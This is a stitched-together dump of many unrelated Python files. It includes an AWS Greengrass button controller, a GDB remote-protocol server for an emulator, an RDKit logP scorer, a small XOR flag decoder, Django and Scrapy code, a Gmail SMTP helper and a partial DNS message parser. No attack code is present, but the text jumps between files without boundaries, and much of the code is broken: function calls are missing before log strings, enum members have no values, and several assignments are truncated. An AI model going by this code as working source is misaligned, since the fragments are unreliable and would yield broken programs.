"on" else: val = "off" msg = { "version": "2017-07-05", # YYYY-MM-DD "ggd_id": ggd_name, "hostname": hostname, "data": [ { "sensor_id": sensor_id, "ts": now.isoformat(), "value": val } ] } mqttc.publish(GGD_BUTTON_TOPIC, json.dumps(msg), 0) return msg def red_push(): msg = button(sensor_id="red-button", toggle=True)"[red_push] publishing button msg: {0}".format(msg)) red_led.on() red_led.pulse() def red_release(): msg = button(sensor_id="red-button", toggle=False)"[red_release] publishing button msg: {0}".format(msg)) def green_push(): msg = button(sensor_id="green-button", toggle=True)"[green_push] publishing button msg: {0}".format(msg)) green_led.on() green_led.pulse() def green_release(): msg = button(sensor_id="green-button", toggle=False)"[green_release] publishing button msg: {0}".format(msg)) def white_push(): msg = button(sensor_id="white-button", toggle=True)"[white_push] publishing button msg: {0}".format(msg)) white_led.pulse() def white_release(): msg = button(sensor_id="white-button", toggle=False)"[white_release] publishing button msg: {0}".format(msg)) white_led.on() def use_box(cli):"[use_box] configuring magic buttons.") red_button.when_pressed = red_push red_button.when_released = red_release green_button.when_pressed = green_push green_button.when_released = green_release white_button.when_pressed = white_push white_button.when_released = white_release white_led.on()"[use_box] configured buttons. White LED should now be on.") try: while 1: time.sleep(0.2) except KeyboardInterrupt: "[use_box] KeyboardInterrupt ... exiting box monitoring loop") def button_green(cli): if cli.light: green_led.on() msg = button(sensor_id="green-button", toggle=cli.toggle) print("[cli.button_green] publishing button msg: {0}".format(msg)) def button_red(cli): if cli.light: red_led.on() msg = button(sensor_id="red-button", toggle=cli.toggle) print("[cli.button_red] publishing button msg: {0}".format(msg)) def button_white(cli): if cli.light: white_led.on() msg = button(sensor_id="white-button", toggle=cli.toggle) print("[cli.button_white] publishing button msg: {0}".format(msg)) def core_connect(device_name, config_file, root_ca, certificate, private_key, group_ca_path): global ggd_name, mqttc cfg = GroupConfigFile(config_file) ggd_name = cfg['devices'][device_name]['thing_name'] iot_endpoint = cfg['misc']['iot_endpoint'] dip = DiscoveryInfoProvider() dip.configureEndpoint(iot_endpoint) dip.configureCredentials( caPath=root_ca, certPath=certificate, keyPath=private_key ) dip.configureTimeout(10) # 10 sec"[button] Discovery using CA:{0} cert:{1} prv_key:{2}".format( root_ca, certificate, private_key )) gg_core, discovery_info = utils.discover_configured_core( device_name=device_name, dip=dip, config_file=config_file, ) if not gg_core: raise EnvironmentError("[button] Couldn't find the Core") ca_list = discovery_info.getAllCas() group_id, ca = ca_list[0] group_ca_file = utils.save_group_ca(ca, group_ca_path, group_id) mqttc = AWSIoTMQTTClient(ggd_name) # local Greengrass Core discovered, now connect to Core from this Device"[button] gca_file:{0} cert:{1}".format( group_ca_file, certificate)) mqttc.configureCredentials(group_ca_file, private_key, certificate) mqttc.configureOfflinePublishQueueing(10, DROP_OLDEST) return mqttc, gg_core if __name__ == '__main__': parser = argparse.ArgumentParser( description='Mini Fulfillment GGD and CLI button', formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('device_name', help="The GGD device_name in the config file.") parser.add_argument('config_file', help="The config file.") parser.add_argument('root_ca', help="Root CA File Path of Cloud Server Certificate.") parser.add_argument('certificate', help="File Path of GGD Certificate.") parser.add_argument('private_key', help="File Path of GGD Private Key.") parser.add_argument('group_ca_path', help="The directory path where the discovered Group CA " "will be saved.") subparsers = parser.add_subparsers() box_parser = subparsers.add_parser( 'box', description='Use the physical button box to drive.') box_parser.add_argument('--on', action='store_true', help="Toggle box ON") box_parser.set_defaults(func=use_box, on=True) green_parser = subparsers.add_parser( 'green', description='Virtual GREEN button pushed') green_parser.add_argument('--on', dest='toggle', action='store_true', help="Virtual toggle ON") green_parser.add_argument('--off', dest='toggle', action='store_false', help="Virtual toggle OFF") green_parser.add_argument('--light', action='store_true') green_parser.set_defaults(func=button_green, toggle=True) red_parser = subparsers.add_parser( 'red', description='Virtual RED button pushed') red_parser.add_argument('--on', dest='toggle', action='store_true', help="Virtual toggle ON") red_parser.add_argument('--off', dest='toggle', action='store_false', help="Virtual toggle OFF") red_parser.add_argument('--light', action='store_true') red_parser.set_defaults(func=button_red, toggle=True) white_parser = subparsers.add_parser( 'white', description='Virtual WHITE button toggled') white_parser.add_argument('--on', dest='toggle', action='store_true', help="Virtual toggle ON") white_parser.add_argument('--off', dest='toggle', action='store_false', help="Virtual toggle OFF") white_parser.add_argument('--light', action='store_true') white_parser.set_defaults(func=button_white, toggle=True) pa = parser.parse_args() client, core = core_connect( device_name=pa.device_name, config_file=pa.config_file, root_ca=pa.root_ca, certificate=pa.certificate, private_key=pa.private_key, group_ca_path=pa.group_ca_path ) if utils.mqtt_connect(mqtt_client=client, core_info=core): pa.func(pa) time.sleep(0.5) mqttc.disconnect() time.sleep(1)
from megastone.util import round_up import threading import logging import io import enum import dataclasses import abc from megastone.errors import UnsupportedError from megastone.mem import SegmentMemory, MemoryAccessError from megastone.debug import Debugger, StopReason, StopType, HookType, CPUError, InvalidInsnError, MemFaultError from .connection import RSPConnection, Signal, parse_ascii, parse_hex_int, parse_hexint_list, parse_list, encode_hex, parse_hex, ParsingError from .stream import EndOfStreamError, TCPStreamServer from .target import load_gdb_regs logger = logging.getLogger(__name__) STOP_POLL_TIME = 0.25 HOOK_TYPE_TO_STOP_REASON = { HookType.CODE: 'hwbreak', HookType.WRITE: 'watch', HookType.READ: 'rwatch', HookType.ACCESS: 'awatch' } ERROR_RESPONSE = b'E01' OK_RESPONSE = b'OK' GDB_TYPE_TO_HOOK_TYPE = { 0: HookType.CODE, 1: HookType.CODE, 2: HookType.WRITE, 3: HookType.READ, 4: HookType.ACCESS } class ServerStopReason(enum.Enum): STOPPED = KILLED = DETACHED = @dataclasses.dataclass class _MonitorCommand(abc.ABC): name: str handler: callable help: str class GDBServer: """GDB Server implementation. Exposes a Debugger to external GDB clients.""" def __init__(self, dbg: Debugger, port=1234, host='localhost'): if not dbg.arch.gdb_supported: raise UnsupportedError('Architecture doesn\'t support GDB') self.dbg = dbg self.stop_reason: ServerStopReason = None self._regs = load_gdb_regs(dbg.arch) self._server = TCPStreamServer(host, port) self._stopped = threading.Event() self._listening = threading.Event() self._cmd_stop_reason: ServerStopReason = None self._cpu_stop_reason: StopReason = None self._stop_exception: CPUError = None self._hooks = {} #HookType => address => Hook self._handlers = { b'?': self._handle_stop_reason, b'D': self._handle_detach, b'k': self._handle_kill, b'qAttached': self._handle_attached, b'qSupported': self._handle_supported, b'qXfer:features:read:target.xml:': self._handle_read_features, b'qXfer:memory-map:read::': self._handle_read_memory_map, b'g': self._handle_read_regs, b'G': self._handle_write_regs, b'm': self._handle_read_mem, b'M': self._handle_write_mem, b's': self._handle_step, b'c': self._handle_continue, b'S': self._handle_step_signal, b'C': self._handle_continue_signal, b'Z': self._handle_add_breakpoint, b'z': self._handle_remove_breakpoint, b'qRcmd,' : self._handle_monitor_command } self._monitor_commands = [ _MonitorCommand('help', self._handle_help, 'Print a list of monitor commands.'), _MonitorCommand('megastone', self._handle_megastone, 'Check whether the server is a Megastone server.'), _MonitorCommand('segments', self._handle_segments, 'Print the list of Segments.'), _MonitorCommand('info', self._handle_info, 'Print information about the Megastone configuration.'), _MonitorCommand('error', self._handle_error, 'Print information about the last CPU error.'), _MonitorCommand('endian', self._handle_endian, 'Print the endian of the server.') ] def run(self, *, persistent=False): """Run the server. Blocks until the client exists or an error occurs.""" self._stopped.clear() self._server.initialize() self._listening.set() with self._server: self._server.set_timeout(STOP_POLL_TIME) while True: reason = self._run_once() if reason is ServerStopReason.STOPPED or reason is ServerStopReason.KILLED or not persistent: self.stop_reason = reason break self._listening.clear() def stop(self): """ Stop the server. This can be safely called from a different thread than the one running the server. """ self._stopped.set() def _run_once(self): conn = self._wait_for_connection() if conn is None: return ServerStopReason.STOPPED with conn: return self._main_loop(conn) def _wait_for_connection(self):'waiting for client connection') while True: try: stream = self._server.get_stream() except TimeoutError: if self._check_stopped(): return None else: return RSPConnection(stream) def _main_loop(self, conn: RSPConnection): self._cmd_stop_reason = None while True: try: command = conn.receive_packet(timeout=STOP_POLL_TIME) except EndOfStreamError: logger.warning('client disconnected') return ServerStopReason.DETACHED if self._check_stopped(): return ServerStopReason.STOPPED if command is None: continue logger.debug(f'received packet: {command}') response = self._handle_command(command) if response is not None: logger.debug(f'sending response: {response}') conn.send_packet(response) if self._cmd_stop_reason is not None: return self._cmd_stop_reason def _handle_command(self, command): for prefix, handler in self._handlers.items(): if command.startswith(prefix): args = command[len(prefix):] return handler(args) return b'' def _check_stopped(self): if self._stopped.is_set():'server stopped by thread') return True return False def _handle_stop_reason(self, args): return self._get_stop_response() def _handle_detach(self, args):'client detached') self._cmd_stop_reason = ServerStopReason.DETACHED return b'OK' def _handle_kill(self, args):'killed by client') self._cmd_stop_reason = ServerStopReason.KILLED return None def _handle_attached(self, args): return b'1' def _handle_read_regs(self, args): return self._encode_regs() def _handle_write_regs(self, args): self._parse_regs(args) return OK_RESPONSE def _handle_read_mem(self, args): address, size = parse_hexint_list(args, 2) try: data =, size) except MemoryAccessError as e: logger.error(str(e)) return ERROR_RESPONSE return encode_hex(data) def _handle_write_mem(self, args): addresses, hex_data = parse_list(args, 2, b':') address, _ = parse_hexint_list(addresses, 2) data = parse_hex(hex_data)'Write memory: 0x{address:X} +0x{len(data):X}') try: self.dbg.mem.write(address, data) except MemoryAccessError as e: logger.error(str(e)) return ERROR_RESPONSE return OK_RESPONSE def _handle_continue(self, args): return self._handle_run(args, None) def _handle_step(self, args): return self._handle_run(args, 1) def _handle_add_breakpoint(self, args): type, address, size = self._parse_hook(args) logger.debug(f'adding hook: {type} 0x{address:X} +0x{size:X}') hook = self.dbg.add_breakpoint(address, size, type) self._add_hook(hook) return OK_RESPONSE def _handle_remove_breakpoint(self, args): type, address, _ = self._parse_hook(args) logger.debug(f'remove hook: {type} 0x{address:X}') hook = self._pop_hook(type, address) self.dbg.remove_hook(hook) return OK_RESPONSE def _handle_continue_signal(self, args): return self._handle_run_signal(args, None) def _handle_step_signal(self, args): return self._handle_run_signal(args, 1) def _handle_run_signal(self, args, count): _, _, address = args.partition(b';') return self._handle_run(address, count) def _handle_run(self, args, count): if len(args) == 0: address = None else: address = parse_hex_int(args) self._cpu_stop_reason = None self._stop_exception = None logger.debug(f'run: address={address}, count={count}') try: self._cpu_stop_reason =, address=address) except CPUError as e: self._stop_exception = e'stopped: {e}') else: logger.debug(f'stopped: {}') return self._get_stop_response() def _handle_supported(self, args): return b'swbreak+;hwbreak+;qXfer:features:read+;qXfer:memory-map:read+;multiprocess-' def _handle_read_features(self, args): features = f'<target version="1.0"><architecture>{self.dbg.arch.gdb_name}</architecture></target>' file = io.BytesIO(features.encode()) return self._handle_xfer(file, args) def _handle_read_memory_map(self, args): file = io.BytesIO() if isinstance(self.dbg.mem, SegmentMemory): self._build_memory_map(file) return self._handle_xfer(file, args) def _build_memory_map(self, fileobj): assert isinstance(self.dbg.mem, SegmentMemory) fileobj.write(b'<memory-map>') for segment in self.dbg.mem.segments: fileobj.write(f'<memory type="ram" start="0x{segment.address:x}" length="0x{segment.size:x}"/>'.encode()) fileobj.write(b'</memory-map>') def _handle_xfer(self, fileobj, args): offset, length = parse_hexint_list(args, 2) data = if len(data) < length: return b'l' + data return b'm' + data def _add_hook(self, hook): address_hooks = self._hooks.setdefault(hook.type, {}) address_hooks[hook.address] = hook def _pop_hook(self, type, address): if type not in self._hooks or address not in self._hooks[type]: raise ParsingError(f'Hook of type {type} does not exist at 0x{address:X}') return self._hooks[type].pop(address) def _parse_hook(self, args): type, address, size = parse_hexint_list(args, 3) htype = GDB_TYPE_TO_HOOK_TYPE.get(type) if htype is None: raise ParsingError(f'Invalid hook type {type}') if size == 0: size = 1 return htype, address, size def _get_stop_response(self): info = '' if self._stop_exception is None: signum = Signal.SIGTRAP if self._cpu_stop_reason is not None: info = self._get_stop_info(self._cpu_stop_reason) elif isinstance(self._stop_exception, MemFaultError): signum = Signal.SIGSEGV elif isinstance(self._stop_exception, InvalidInsnError): signum = Signal.SIGILL else: signum = Signal.SIGABRT return f'T{signum.value:02X}{info}'.encode() def _get_stop_info(self, reason: StopReason): if reason.type is not StopType.HOOK: return '' hook = reason.hook key = HOOK_TYPE_TO_STOP_REASON.get(hook.type) if key is None: return '' if hook.type.is_data: value = f'{hook.address:X}' else: value = '' return f'{key}:{value};' def _encode_reg(self, gdb_reg): if gdb_reg.is_dummy: value = 0 else: value = self.dbg.regs[] return self.dbg.arch.endian.encode_int(value, gdb_reg.size) def _parse_reg(self, data): return self.dbg.arch.endian.decode_int(data) def _encode_regs(self): reg_data = b''.join(self._encode_reg(reg) for reg in self._regs) return encode_hex(reg_data) def _parse_regs(self, data): stream = io.BytesIO(parse_hex(data)) for reg in self._regs: reg_data = if len(reg_data) < reg.size: raise ParsingError('Received register packet is too short') if reg.is_dummy: continue value = self._parse_reg(reg_data) if value != self.dbg.regs[]: logger.debug(f'Setting register {} to 0x{value:X}') self.dbg.regs[] = value def _handle_monitor_command(self, args): cmd = parse_ascii(parse_hex(args)) response = self._handle_monitor_command_string(cmd) + '\n' return encode_hex(response.encode()) def _handle_monitor_command_string(self, s): if s == '': s = 'help' commands = [cmd for cmd in self._monitor_commands if] if len(commands) == 0: return f'Unknown monitor command {s}. Type "monitor help" for a list of commands.' elif len(commands) > 1: names = ', '.join( for cmd in commands) return f'Ambiguous monitor command {s}: could be {names}.' else: logger.debug(f'monitor command: {commands[0].name}') return commands[0].handler() def _handle_help(self): lines = ['Megastone monitor commands:'] for command in self._monitor_commands: lines.append(f'{} - {}') return '\n'.join(lines) def _handle_megastone(self): return 'true' def _handle_segments(self): if not isinstance(self.dbg.mem, SegmentMemory): return 'Current Memory doesn\'t support segments.' segs = sorted(self.dbg.mem.segments, key=lambda s: s.start) if len(segs) == 0: return 'No segments information is available.' addr_width = _get_field_width((seg.address for seg in segs), 'Address') size_width = _get_field_width((seg.size for seg in segs), 'Size') lines = [f'{"Address":{addr_width}} {"Size":{size_width}} Perms Name'] for seg in segs: lines.append(f'{seg.address:#{addr_width}x} {seg.size:#{size_width}x} {seg.perms:<5} {}') return '\n'.join(lines) def _handle_info(self): return ( f'Architecture: {}\n' f'InstructionSet: {}\n' f'Endian: {}\n' f'Debugger class: {self.dbg.__class__.__name__}\n' f'Memory class: {self.dbg.mem.__class__.__name__}\n' f'Server address: {}:{self._server.port}' ) def _handle_error(self): if self._stop_exception is None: return 'No CPU error occurred.' return str(self._stop_exception) def _handle_endian(self): return def _get_field_width(values, title): max_value = max(values) max_size = round_up(max_value.bit_length(), 4) // 4 return max(len(title), max_size + 2)
<gh_stars>0 # coding=utf-8 from typing import List import numpy as np from rdkit import Chem from rdkit.Chem import rdMolDescriptors class clogp(object): """ Optimize strutures to have a predicted clogP within a particular range""" def __init__(self, range: str): try: numbers = list(map(float, range.split("-"))) except: raise ValueError("clogp needs to be a valid float number or a valid range like: 2.0-3.0") if len(numbers) == 1: self.clogp = (numbers,numbers) else: self.clogp = (numbers[0], numbers[1]) def __call__(self, smiles: List[str]) -> dict: mols = [Chem.MolFromSmiles(smile) for smile in smiles] valid = [1 if mol is not None else 0 for mol in mols] valid_idxs = [idx for idx, boolean in enumerate(valid) if boolean == 1] valid_mols = [mols[idx] for idx in valid_idxs] clogp = [ self.calcLogP(mol) for mol in valid_mols ] logp_score = [self.score_clogp(ele) for ele in clogp] score = np.full(len(smiles), 0, dtype=np.float32) for idx, value in zip(valid_idxs, logp_score): score[idx] = value #return {"total_score": np.array(score, dtype=np.float32), "clogp": clogp} return {"total_score": np.array(score, dtype=np.float32)} def calcLogP(self, mol): try: return rdMolDescriptors.CalcCrippenDescriptors(mol)[0] except: return None def score_clogp(self, clogp): if clogp is None: return 0 else: if clogp < self.clogp[0]: min_distance = abs(self.clogp[0] - clogp) else: #greater equal than lower bound if clogp <= self.clogp[1]: #right in the boundary return 1 else: distance_to_lower_bound = abs(self.clogp[0] - clogp) distance_to_upper_bound = abs(self.clogp[1] - clogp) min_distance = min(distance_to_lower_bound, distance_to_upper_bound) #transfor distance to score between 0 and 1 return 1 - np.tanh(min_distance)
from .client import SocketClient from .server import ( SocketServer, SocketServerHandler, )
af = list(b"\x13\x13\x11\x17\x12\x1d\x48\x45\x45\x41\x0b\x26\x2c\x42\x5f\x09\x0b\x5f\x6c\x3d\x56\x56\x1b\x54\x5f\x41\x45\x29\x3c\x0b\x5c\x58\x00\x5f\x5d\x09\x54\x6c\x2a\x40\x06\x06\x6a\x27\x48\x42\x5f\x4b\x56\x42\x2d\x2c\x43\x5d\x5e\x6c\x2d\x41\x07\x47\x43\x5e\x31\x6b\x5a\x0a\x3b\x6e\x1c\x49\x54\x5e\x1a\x2b\x34\x05\x5e\x47\x28\x28\x1f\x11\x26\x3b\x07\x50\x04\x06\x04\x0d\x0b\x05\x03\x48\x77\x0a") flag = "r" char = "r" for stuff in af: flag += chr(ord(char) ^ stuff) char = flag[-1] print(flag)
<gh_stars>1-10 from django.apps import AppConfig class CbcsTicketsConfig(AppConfig): name = 'CBCS_Tickets'
<gh_stars>0 from typing import List, Dict, Any import pluggy from git import Repo, Tag from releaseherald.configuration import Configuration from releaseherald.plugins import CommitInfo from releaseherald.plugins.interface import ( MutableProxy, VersionNews, News, Output, CommandOptions, ) hookspec = pluggy.HookspecMarker("releaseherald") @hookspec def process_config(config: Configuration): """ Called as the first callback to the plugin. It can use this to initiate itself based in the configuration read from the config file. If also has a chance to change the configuration. It can for example parse and validate it's own sub configuration and replace the dict in `config` with a more manageable object. Args: config: The configuration """ pass @hookspec def get_command_options(command: str) -> CommandOptions: """ This callback give chance to a plugin to add commandline options to various commands. It is called with the name of the command. Args: command: something Returns: collection of `click.Options` that are added to the cli command and a callable that can set the configured value as the default for the cli option""" pass @hookspec def on_start_command(command: str, kwargs: Dict[str, Any]): """ Called before a cli command start to execute. Args: command: the name of the command kwargs: the parameters the command called with """ pass @hookspec def process_tags(repo: Repo, tags: List[Tag]): """ Args: repo: the git repository tags: List of tags releaseherald consider as the versions it needs to collect newsfragments. The plugin is free to manipulate the list of tags complex filtering can be implemented here. """ pass @hookspec def process_commits(repo: Repo, tags: List[Tag], commits: List[CommitInfo]): """ The aim of this hook is to collect the list of commits based on the tags. The plugin supposed to modify the `commits` list. The default plugin, just turns the tags into [CommitInfo][releaseherald.plugins.interface.CommitInfo]. Args: repo: the git repository tags: the tags collected by [process_tags][releaseherald.plugins.hookspecs.process_tags] commits: Info about each commits """ pass @hookspec def get_news_between_commits( repo: Repo, commit_from: CommitInfo, commit_to: CommitInfo, news: List[News], ): """ In this hook the plugin can alter the collected `news` between the two commits. It is called for every consecutive commit pairs processed by [process_commits][releaseherald.plugins.hookspecs.process_commits]. Args: repo: the git repository commit_from: The earlier commit commit_to: The later commit news: The list of news that previous plugins collected, can be altered by the plugin """ pass @hookspec def get_version_news( repo: Repo, commit_from: CommitInfo, commit_to: CommitInfo, news: List[News], version_news: MutableProxy[VersionNews], ): """ In this hook plugins can produce a wrapper around the the list of news that represent a version in releaseherald datastructure. Called for every consecutive commit pairs processed by [process_commits][releaseherald.plugins.hookspecs.process_commits] with the news processed by [get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits] for the same two commits. Args: repo: the git repository commit_from: The earlier commit commit_to: The later commit news: The list of news collected by [get_news_between_commits][releaseherald.plugins.hookspecs.get_news_between_commits] version_news: The version news representing a version with the changes between two commits """ pass @hookspec def process_version_news(version_news: List[VersionNews]): """ This hook give a chance for the plugin to alter the list of versions. Args: version_news: All the version/news collected so far """ pass @hookspec def generate_output( version_news: List[VersionNews], output: MutableProxy[Output] ): """ The plugin can generate an output in memory in any kind of format it want. It also has a chance to alter or replace an output generated by any previous plugins Args: version_news: All the version/news collected and processed by [process_version_news][releaseherald.plugins.hookspecs.process_version_news] output: Output in plugin specific format """ pass @hookspec def write_output(output: Output): """ The plugin should do its final output step here. Write to file, to stdout or send a mail, upload to some service whatever desired. Args: output: the output from [generate_output][releaseherald.plugins.hookspecs.generate_output] """ pass
<reponame>senlyu163/crawler<filename>spiders/ # -*- coding: utf-8 -*- import scrapy from scrapy.linkextractors import LinkExtractor from scrapy.spiders import CrawlSpider, Rule from ..utils import extract_CN_from_content from ..items import ScrapySpiderItem import re class A505Spider(CrawlSpider): name = '505' allowed_domains = [''] start_urls = [''] rules = ( Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=lists&catid=\d+'), follow=True), Rule(LinkExtractor(allow=r'/index\.php\?m=content&c=index&a=show&catid=\d+&id=\d+'), callback='parse_item', follow=True), Rule(LinkExtractor(allow=r'index\.php\?m=content&c=index&a=lists&catid=\d+&page=\d+'), follow=True), # Rule(LinkExtractor(allow=r'Items/'), callback='parse_item', follow=True), ) def parse_item(self, response): item = ScrapySpiderItem() item['url'] = response.url date = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[2]/tr/td/span').extract_first() date ="(\d{4}-\d{2}-\d{2})", date).groups()[0] item['date'] = date title = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[1]/tr/td/span/text()').extract_first() item['title'] = title contents = response.xpath('/html/body/table/tr/td/table[5]/tr/td/table[5]/tr').extract() item['contents'] = extract_CN_from_content(contents) return item
<gh_stars>0 from django.db import transaction # from books import models from datetime import datetime @transaction.atomic def populate_authors(): print("Adding authors...") authors = [ models.Author( id=1, first_name="Kurt", last_name="Vonnegut", birthday=datetime(1922, 11, 11), email="<EMAIL>" ), models.Author( id=2, first_name="Ray", last_name="Bradbury", birthday=datetime(1920, 8, 22), email="<EMAIL>" ), models.Author( id=3, first_name="Isaac", last_name="Asimov", birthday=datetime(1920, 1, 2), email="<EMAIL>" ), models.Author( id=4, first_name="<NAME>.", last_name="Dick", birthday=datetime(1928, 12, 16), email="<EMAIL>" ), models.Author( id=5, first_name="George", last_name="Orwell", birthday=datetime(1903, 6, 25), email="<EMAIL>" ) ] models.Author.objects.bulk_create(authors) @transaction.atomic def populate_publishers(): print("Adding publishers...") publishers = [ models.Publisher( id=1, name="HarperCollins Publishers", address="London, United Kingdom", ), models.Publisher( id=2, name="Random House USA Inc", address="New York, United States", ), models.Publisher( id=3, name="Bantam Doubleday Dell Publishing Group Inc", address="New York, United States" ), models.Publisher( id=4, name="Orion Publishing Co", address="London, United Kingdom", ), models.Publisher( id=5, name="Penguin Books Ltd", address="London, United Kingdom", ), models.Publisher( id=6, name="Vintage Publishing", address="London, United Kingdom", ) ] models.Publisher.objects.bulk_create(publishers) @transaction.atomic def populate_books(): print("Adding books...") books = [ models.Book( id=1, title="Fahrenheit 451", description = ("Fahrenheit 451 is a 1953 dystopian novel by American writer <NAME>." "Often regarded as one of his best works, the novel presents a future American society where" "books are outlawed and firemen burn any that are found."), isbn="9780006546061", pub_date=datetime(2019, 2, 7), author=models.Author.objects.get(id=2), publisher=models.Publisher.objects.get(id=1) ), models.Book( id=2, title="I, Robot", description=("I, Robot is a fixup novel of science fiction short stories or essays by" "American writer <NAME>. The stories originally appeared in the American magazines" "Super Science Stories and Astounding Science Fiction between 1940 and 1950 and were" "then compiled into a book for stand-alone publication by Gnome Press in 1950, in an" "initial edition of 5,000 copies."), isbn="9780007491513", pub_date=datetime(2013, 4, 1), author=models.Author.objects.get(id=3), publisher=models.Publisher.objects.get(id=1) ), models.Book( id=3, title="Foundation and Empire", description=("Foundation and Empire is a science fiction novel by American writer <NAME>" "originally published by Gnome Press in 1952. It is the second book in the Foundation Series," "and the fourth in the in-universe chronology."), isbn="9780553293371", pub_date=datetime(1997, 4, 1), author=models.Author.objects.get(id=3), publisher=models.Publisher.objects.get(id=2) ), models.Book( id=4, title="Foundation And Earth", description=("Foundation and Earth is a science fiction novel by American writer <NAME>," "the fifth novel of the Foundation series and chronologically the last in the series." "It was published in 1986, four years after the first sequel to the Foundation trilogy," "which is titled Foundation's Edge."), isbn="9780553587579", pub_date=datetime(2004, 12, 15), author=models.Author.objects.get(id=3), publisher=models.Publisher.objects.get(id=1) ), models.Book( id=5, title="Do Androids Dream Of Electric Sheep?", description=("Do Androids Dream of Electric Sheep? (retitled Blade Runner: Do Androids Dream" "of Electric Sheep? in some later printings) is a dystopian science fiction novel by American" "writer <NAME>, first published in 1968."), isbn="9780575094185", pub_date=datetime(2017, 11, 20), author=models.Author.objects.get(id=4), publisher=models.Publisher.objects.get(id=4) ), models.Book( id=6, title="1984", description=("Nineteen Eighty-Four: A Novel, often published as 1984, is a dystopian social" "science fiction novel by English novelist <NAME>. It was published on 8 June 1949" "by <NAME> as Orwell's ninth and final book completed in his lifetime."), isbn="9780141036144", pub_date=datetime(2008, 10, 1), author=models.Author.objects.get(id=5), publisher=models.Publisher.objects.get(id=5) ), models.Book( id=7, title="Animal Farm", description=("Animal Farm is an allegorical novella by <NAME>, first published in" "England on 17 August 1945. The book tells the story of a group of farm animals who rebel" "against their human farmer, hoping to create a society where the animals can be equal," "free, and happy."), isbn="9780141036137", pub_date=datetime(2008, 10, 1), author=models.Author.objects.get(id=5), publisher=models.Publisher.objects.get(id=5) ), models.Book( id = 8, title="Cat's Cradle", description=("Cat's Cradle is a satirical postmodern novel, with science fiction elements," "by American writer <NAME>. Vonnegut's fourth novel, it was first published in 1963," "exploring and satirizing issues of science, technology, the purpose of religion," "and the arms race, often through the use of black humor."), isbn="9780241951606", pub_date=datetime(2011, 4, 7), author=models.Author.objects.get(id=1), publisher=models.Publisher.objects.get(id=1) ), models.Book( id=9, title="Mother Night", description=("Mother Night is a novel by American author <NAME>, first published" "in February 1962. The title of the book is taken from Goethe's Faust. The novel takes the" "form of the fictional memoirs of Howard <NAME> Jr., an American, who moved to Germany" "in 1923 at age 11, and later became a well-known playwright and Nazi propagandist."), isbn="9780099819301", pub_date=datetime(2019, 3, 5), author=models.Author.objects.get(id=1), publisher=models.Publisher.objects.get(id=4) ) ] models.Book.objects.bulk_create(books) def run(): try: populate_authors() populate_publishers() populate_books() except Exception as e: print(e)
<reponame>sdss/tron __all__ = ['RawReplyEncoder'] from tron import Misc from tron.Hub.KV.KVDict import kvAsASCII from tron.Parsing.dequote import dequote from .ReplyEncoder import ReplyEncoder class RawReplyEncoder(ReplyEncoder): """ Encode Replys without any protocol information. Options: EOL - choose the EOL string to use. keyName - set a single keyword, whose _value_ alone will be returned. """ def __init__(self, **argv): ReplyEncoder.__init__(self, **argv) # How do we terminate encoded lines? # self.EOL = argv.get('EOL', '\n') self.keyName = argv.get('keyName', None) def encode(self, r, nub, noKeys=False): """ Encode a protocol-free reply for a given nub. """ if self.keyName: rawVal = r.KVs.get(self.keyName, '') val = dequote(rawVal) Misc.log('RAWDEQUOTE', 'rawVal=%r val=%r' % (rawVal, val)) else: val = self.encodeKeys(r.src, r.KVs) if val: return '%s%s' % (val, self.EOL) else: return '' def encodeKeys(self, src, KVs): """ Return a string encoding of KVs stored in an OrderedDict. Args: src - ignored KVs - an OrderedDict of values. See Parsing/ for important details. Notes: """ if self.debug > 5: Misc.log('ASCIIReplyEnc.encode', 'encoding %r' % (KVs, )) if KVs is None: return '' keylist = [] for k, v in KVs.items(): if self.debug > 5: Misc.log('ASCIIReplyEnc.encode', 'encoding %r=%r' % (k, v)) keylist.append(kvAsASCII(k, v)) return '; '.join(keylist)
# login.txt should contain address on first line and app specific password on the second # # <EMAIL> # <PASSWORD> def sendEmail(subject, message_): import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText with open("login.txt") as f: login = gmailUser = login[0] gmailPassword = login[1] recipient = login[0] message = message_ msg = MIMEMultipart() msg['From'] = gmailUser msg['To'] = recipient msg['Subject'] = subject msg.attach(MIMEText(message)) mailServer = smtplib.SMTP('', 587) mailServer.ehlo() mailServer.starttls() mailServer.ehlo() mailServer.login(gmailUser, gmailPassword) mailServer.sendmail(gmailUser, recipient, msg.as_string()) mailServer.close()
<reponame>mohammedelzanaty/myRoad2BeFullStack def plant_recommendation(care): if care == 'low': print('aloe') elif care == 'medium': print('pothos') elif care == 'high': print('orchid') plant_recommendation('low') plant_recommendation('medium') plant_recommendation('high')
<gh_stars>0 from dns_messages.dns_objects import * from ..dns_objects.dns_message import DnsMessage, OPCODE, RCODE from ..utilities import convert_bytes_to_bit_list, extract_int_from_raw_bits, parse_name RR_TYPE_TO_CLASS_MAPPING = { RRType.A: A, RRType.NS: None, RRType.CNAME: CNAME, RRType.SOA: SOA, RRType.PTR: PTR, RRType.HINFO: HINFO, RRType.MX: MX, RRType.TXT: TXT, RRType.RP: None, RRType.AFSDB: None, RRType.SIG: None, RRType.KEY: None, RRType.AAAA: AAAA, RRType.LOC: None, RRType.SRV: None, RRType.NAPTR: None, RRType.KK: None, RRType.CERT: None, RRType.DNAME: None, RRType.APL: None, RRType.DS: None, RRType.SSHFP: None, RRType.IPSECKEY: None, RRType.RRSIG: None, RRType.NSEC: None, RRType.DNSKEY: None, RRType.DHCID: None, RRType.NSEC3: None, RRType.NSEC3PARAM: None, RRType.TLSA: None, RRType.SMIMEA: None, RRType.HIP: None, RRType.CDS: None, RRType.CDNSKEY: None, RRType.OPENPGPKEY: None, RRType.CSYNC: None, RRType.ZONEMD: None, RRType.SVCB: None, RRType.HTTPS: None, RRType.EUI48: None, RRType.EUI64: None, RRType.TKEY: None, RRType.TSIG: None, RRType.URI: None, RRType.CAA: None, RRType.TA: None, RRType.DLV: None, } class DnsMessageParser: def __init__(self, message: bytes): self._message_in_bytes = message self._message_in_bits = convert_bytes_to_bit_list(message=message) self._qd_count = 0 self._an_count = 0 self._ns_count = 0 self._ar_count = 0 self._byte_index = 12 self._parsed_message: DnsMessage = None def parse_message(self) -> DnsMessage: self._parsed_message: DnsMessage = self._parse_message_header() self._parse_question_section() self._parse_answer_section() self._parse_authority_section() self._parse_additional_section() return self._parsed_message def _parse_message_header(self) -> DnsMessage: 